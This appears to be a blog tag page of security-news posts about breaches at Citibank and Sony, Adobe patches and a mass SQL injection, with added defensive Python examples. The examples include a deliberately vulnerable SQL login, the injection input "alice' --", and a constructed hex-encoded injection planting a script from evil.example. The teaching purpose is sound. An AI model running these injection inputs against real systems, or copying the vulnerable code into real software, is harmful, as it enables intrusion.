Posts tagged ‘website’

Citibank Hacked – Good Security Measures Mitigated Damage

Citibank was just hacked and hundreds of thousands of customer accounts were exposed. Of their 21 million credit and debit card holders, one per cent, or approximately 210,000 accounts had their details stolen in this breach of security. Give or take.

Which sounds bad.

And is … to an extent.

But it could have been much worse. The damage done from the security violation was mitigated greatly by Citibank’s good security practices.

First, the unauthorized access to Citi’s Account Online was discovered during routine monitoring. Already a good start: the access is actually monitored. The next mitigating factor: only 1% of accounts were exposed. Even better. Further, Citibank is contacting customers whose information was impacted. Good. Citi has already implemented enhanced procedures to prevent a recurrence of this type of event. Great! But best of all, THE most important mitigating factor? Only names, email addresses, contact information, and account numbers were exposed. Birth dates, PINs, SSNs, card expiration dates, card CVV security codes, and the rest of the truly sensitive account details were NOT compromised, because THAT information was held on a separate and even more secure server. Breaking into the customer-facing web application did not hand the attackers the data needed to actually use a card.

(Sony, are you listening?!)

That is how security should be done.

Because, let’s face it, hacks will happen. Security will be breached. It’s not a matter of if, it’s a matter of when, how often, and how bad is it. Good security to prevent being hacked is a great start. But just as important are good policies and practices to mitigate the damage when the inevitable happens. Hackers are determined souls, and let’s face it, computers, having been created by humanity, are just as fallible in hardware and software as we fleshy creatures ourselves are. We might like to pretend otherwise, but nobody is perfect, including the folks who wrote your bestest-of-the-best grade-A number-one security software. We all make mistakes. But we don’t have to all pay through the nose for them if we take security seriously.

Ocean’s Eleven – Sony Hacked Again?

Well, it looks like yet another Sony website has been hacked as the “Sownage” campaign continues. This time it was Sony’s Brazilian music website that was taken down temporarily to clean up a defacement. Which makes this Hackers 11, Sony 0.

You’d really think that Sony would be doing more to improve their security right now…

Time To Update Again – Adobe Patches Flash Vuln

Adobe has released an update to its Flash Player that fixes a cross-site scripting vulnerability on all platforms (Windows, Linux, Macintosh, Solaris, and even Android), which is not much of a surprise, as Adobe products are riddled with security holes and are a favourite attack vector. Time to update, yet again. According to Adobe’s security bulletin APSB11-13, the flaw is already being exploited in the great wilds of the interwebs through malicious links sent to you by email, so you really should update right away.

Adobe has only patched Flash, and so far only on desktop platforms. The Android build of Flash is due sometime this week.

Adobe says it has not seen attacks targeting Adobe Reader or Adobe Acrobat (hence the Flash-only update), but that does not mean those products are immune to the same (or a related) security hole. It only means Adobe has no evidence of them being exploited the way Flash is in this case.

Blah blah blah. When it comes to Adobe, we’ve heard it all before. The specific vuln may be different, but it’s still the same old tune on a permanent loop, which is why it is critical to keep your Adobe products updated regularly.

What IS news, however, is that Adobe rushed this update out on a Sunday. Their staff must have been burning the weekend oil. But since Adobe itself rates this Flash patch as merely “important” and not “critical”, one has to ask: why?

Could Sony’s current woes have put everyone on heightened security?

Well, whatever the case, CVE-2011-2107 is worth checking out. Update now, while supplies last.  ;)

Oh, and as always, don’t open stuff from emails that you aren’t sure of!

Sony – Losing Even More Face Since…

For those of you who even care at this point, Sony has been hacked, yet again. The parts that come as no surprise whatsoever: it was a simple SQL injection vulnerability that let the attackers through, it was done by LulzSec, and it wasn’t the PSN this time but the Sony Pictures website.

What is a surprise, however, is that of the over 1 million user accounts exposed by the hack, not a single password was hashed. They were ALL stored as plain text, so whoever dumped the table got every password ready to use, on Sony’s site and on every other site where those users reused it. Which, really, is incredibly bad security and, for Sony by this point, a horrible disgrace. So if you’re a Sony Pictures website user, well, sorry.

Sony has failed you.

In multiple ways.

Again.
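To make the two failures above concrete, here is an added example (mine, not Sony’s code and not from the original post) of a login routine built the way the breach suggests theirs was, next to the fixed version. It uses only the standard library and an in-memory SQLite table with one constructed account; the table layout, column names and the "alice"/"hunter2" credentials are assumptions made for the example.

```python
"""Vulnerable login (string-built SQL, plaintext passwords) beside a hardened
login (parameterized query, salted PBKDF2 hash, constant-time compare).
Added example; the sample account and schema are constructed."""
import hashlib
import hmac
import os
import sqlite3

# Constructed sample account; "hunter2" stands in for a real user's password.
SAMPLE_USERS = [("alice", "hunter2")]
# PBKDF2 cost. Kept modest so the example runs quickly; raise it in production.
PBKDF2_ITERATIONS = 100_000


def _new_db(schema):
    db = sqlite3.connect(":memory:")
    db.execute(schema)
    return db


# ---- How the breach described above happens: string-built SQL, plaintext passwords ----

def vulnerable_setup():
    db = _new_db("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    for user, pw in SAMPLE_USERS:
        db.execute("INSERT INTO users VALUES (?, ?)", (user, pw))  # stored as-is
    return db


def vulnerable_login(db, username, password):
    # Attacker-controlled text is pasted straight into the SQL, so it can rewrite
    # the query. A username of  alice' --  comments out the password check entirely.
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return db.execute(query).fetchone() is not None


def vulnerable_dump(db):
    # What the attacker walks away with after a successful injection: every password, readable.
    return [pw for (pw,) in db.execute("SELECT password FROM users")]


# ---- The fixed version: parameterized queries, salted slow hashes ----

def hash_password(password, salt=None):
    """Return (salt, PBKDF2-HMAC-SHA256 digest); a fresh random salt per user."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return salt, digest


def hardened_setup():
    db = _new_db("CREATE TABLE users (username TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    for user, pw in SAMPLE_USERS:
        salt, digest = hash_password(pw)
        db.execute("INSERT INTO users VALUES (?, ?, ?)", (user, salt, digest))
    return db


def hardened_login(db, username, password):
    # Placeholder binding: the driver sends the username as data, never as SQL text.
    row = db.execute("SELECT salt, pw_hash FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        hash_password(password, b"\x00" * 16)  # burn the same time for unknown users
        return False
    salt, stored = row
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, stored)  # constant-time comparison


def hardened_dump(db):
    # Same table, same attacker: only per-user digests to show for it, no passwords.
    return [bytes(h) for (h,) in db.execute("SELECT pw_hash FROM users")]


def demo():
    """Run both variants against the same inputs and return the outcomes."""
    weak, strong = vulnerable_setup(), hardened_setup()
    return {
        "weak_real_login": vulnerable_login(weak, "alice", "hunter2"),
        "weak_injected_login": vulnerable_login(weak, "alice' --", "wrong"),
        "weak_dump": vulnerable_dump(weak),
        "strong_real_login": hardened_login(strong, "alice", "hunter2"),
        "strong_injected_login": hardened_login(strong, "alice' --", "wrong"),
        "strong_dump": hardened_dump(strong),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Calling demo() shows the injected username logging in and the table dumping every password in the clear on the vulnerable side, while on the fixed side the same input fails and a dump yields only 32-byte digests. The iteration count is deliberately low for the example; production code should use a much higher one or a memory-hard hash such as scrypt or Argon2.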

Teh Interwebs – It’s Like Scary!

If you think surfing the internet is a scary thing to do, what with so many malicious websites out there ready to infect your computer (or smartphone), then try being a website owner.

Network Solutions, Happily Providing Website Owners With Malware Since…

Take, for example, anyone running a website hosted by Network Solutions.  Turns out that one of their widgets, there to make your website construction easier, was actually infected with malware!

What’s worse, Network Solutions is neither apologizing for infecting your websites, nor even saying how their widget got infected in the first place.  They just tell you to delete it.  Oh.  How informative.  How helpful.

Initial reports based on Google and Yahoo searches estimate anywhere between half a million and five million domains may have been infected.  Network Solutions, of course, denies any such numbers as being so high, but as of yet has failed to provide its own numbers to back that up.

SQL Vs. Apple … And A Whole Lot Of Others

A SQL injection attack has hit approximately half a million legitimate web pages, using database commands to plant hidden links to malware exploit sites in the page content. Among those hit is the ever-famous Apple, whose iTunes podcast promotion pages were identified as infected. Fortunately, Apple was quick to clean up its infections.

Plenty of other websites have been hit by this SQL injection as well, obviously. The ongoing injection attacks change frequently enough that they have yet to be stopped.
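An added example, not from the original post and not anyone’s production code, of the cleanup work that follows an injection like this: it scans content rows for script tags pointing at hosts the site does not own, strips them, and decodes the hex-wrapped T-SQL that these mass-injection requests have commonly carried so the planted statement can be read. The rows, the request line and the host names are constructed; the request shape is an assumption, since the post itself does not describe the payload.

```python
"""Find and remove injected <script src=...> tags in stored content, and decode
the hex literal in CAST(0x... AS VARCHAR) injection payloads. Added example;
all sample data below is constructed."""
import re
from urllib.parse import urlparse

# Matches a complete <script ... src=URL ...></script> element, any quoting, any case.
SCRIPT_SRC_RE = re.compile(
    r"<script[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)['\"]?[^>]*>\s*</script\s*>",
    re.IGNORECASE,
)
# Picks the hex literal and cast type out of a CAST(0x... AS [N]VARCHAR) construct.
HEX_CAST_RE = re.compile(r"CAST\(\s*0x([0-9a-fA-F]+)\s+AS\s+(N?VARCHAR)", re.IGNORECASE)

# Constructed sample content rows: (row id, column, stored text).
SAMPLE_ROWS = [
    (1, "title", "Episode 12: Shipping Safely"),
    (2, "description",
     "Show notes.<script src=http://evil.example/ur.php></script>"),
    (3, "description",
     'Legit embed <script src="https://cdn.example.com/player.js"></script>'),
    (4, "body",
     "Two copies:<script src=http://evil.example/ur.php></script>"
     "<script src=http://evil.example/ur.php></script>"),
]
# Hosts this (hypothetical) site legitimately loads scripts from.
TRUSTED_HOSTS = {"cdn.example.com"}

# Constructed request line (already URL-decoded) in the shape these campaigns used:
# T-SQL that hides the real statement inside a hex literal. Assumed, not from the post.
HIDDEN_SQL = "UPDATE posts SET body = body + '<script src=http://evil.example/ur.php></script>'"
SAMPLE_REQUEST = (
    "GET /podcast.aspx?id=1;DECLARE @S VARCHAR(4000);SET @S=CAST(0x"
    + HIDDEN_SQL.encode("ascii").hex() + " AS VARCHAR(4000));EXEC(@S);-- HTTP/1.1"
)


def _host_of(url):
    # Injected tags usually carry absolute http URLs; tolerate schemeless "//host/x" too.
    parsed = urlparse(url if "//" in url else "//" + url)
    return (parsed.hostname or "").lower()


def find_injected_scripts(rows, trusted_hosts=TRUSTED_HOSTS):
    """Return [(row_id, column, host)], one entry per script tag from an untrusted host."""
    hits = []
    for row_id, column, text in rows:
        for m in SCRIPT_SRC_RE.finditer(text):
            host = _host_of(m.group(1))
            if host and host not in trusted_hosts:
                hits.append((row_id, column, host))
    return hits


def strip_injected_scripts(text, trusted_hosts=TRUSTED_HOSTS):
    """Remove untrusted script tags from one field; trusted embeds are left alone."""
    def keep_or_drop(m):
        return m.group(0) if _host_of(m.group(1)) in trusted_hosts else ""
    return SCRIPT_SRC_RE.sub(keep_or_drop, text)


def decode_hex_sql(request):
    """Decode every CAST(0x.. AS [N]VARCHAR) literal so the injected SQL is readable.
    VARCHAR casts hold single-byte text; NVARCHAR casts hold UTF-16LE."""
    decoded = []
    for m in HEX_CAST_RE.finditer(request):
        hexstr = m.group(1)
        if len(hexstr) % 2:          # SQL Server accepts odd-length literals; pad them
            hexstr = "0" + hexstr
        raw = bytes.fromhex(hexstr)
        encoding = "utf-16-le" if m.group(2).upper() == "NVARCHAR" else "latin-1"
        decoded.append(raw.decode(encoding, errors="replace"))
    return decoded


if __name__ == "__main__":
    for hit in find_injected_scripts(SAMPLE_ROWS):
        print("injected script in row %d column %s from %s" % hit)
    for row_id, column, text in SAMPLE_ROWS:
        print(row_id, column, repr(strip_injected_scripts(text)))
    print("decoded payload:", decode_hex_sql(SAMPLE_REQUEST))
```

Run the scan before and after the cleanup: the first pass lists the rows to fix, the stripped text goes back into the database, and a second pass should come back empty. Decoding the request payload is what tells you which table and column the attack targeted, which is where to look first.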

Adobe – Chilly Towards A Hot ColdFusion Vuln

Adobe’s ColdFusion application server saw a recent update to patch a security hole that Adobe labeled as “important”. But just how important was patching this hole? Well, a number of researchers now claim it should have been labeled “critical”, because the vuln could actually let attackers seize control of servers in a “full system compromise”. It not only allows someone to manipulate system files, but also to upload scripts and even tamper with the database directly. As holes go, it really doesn’t get much worse than that.

Fortunately, Adobe did patch the hole. But downplaying the severity of the vulnerability may mean fewer people apply the fix as promptly as they should.

Disney – Sued For Spying On Your Kids?

Walt Disney’s internet subsidiary, Walt Disney Internet Group, and several partners such as Clearspring Technologies and Warner Bros. Records, are being sued in the US District Court in Los Angeles for allegedly using Adobe Flash Player cookies to track highly personal information about users, the majority of whom are minors. The Local Shared Objects (LSOs), otherwise known as Flash cookies, have supposedly been gathering detailed user information over long periods, since at least 2007, in ways that allegedly violate the sites’ privacy policies. These LSOs survive when a user clears browser cookies, and were used to respawn the deleted cookies as “zombie cookies”, allegedly re-identifying users and continuing to track them without their knowledge or consent.

Axl Rose – Twitter,  Twit, Or Just Too Busy Getting T**t?

False rumors have been spread that an upcoming European tour of Guns N’ Roses was canned, thanks to a bit of Twitter hacking of Axl Rose’s account.  The tweet from Axl that all was over was, of course, not really from Axl at all.  And he might have even been able to catch it and prevent the spread, had he ever been using his Twitter account instead of, well, doing anything more entertaining than tweeting.  But, alas, he actually has a life.  And so the hack went uncontested long enough for people to believe it.  It’s nice to see someone on Twitter actually busy with real life for a change.  But it’s also a good reminder that if you choose to have an online presence, maybe you should at least log in every once in a while.  Or just let it drop entirely if you’re too busy to take it seriously.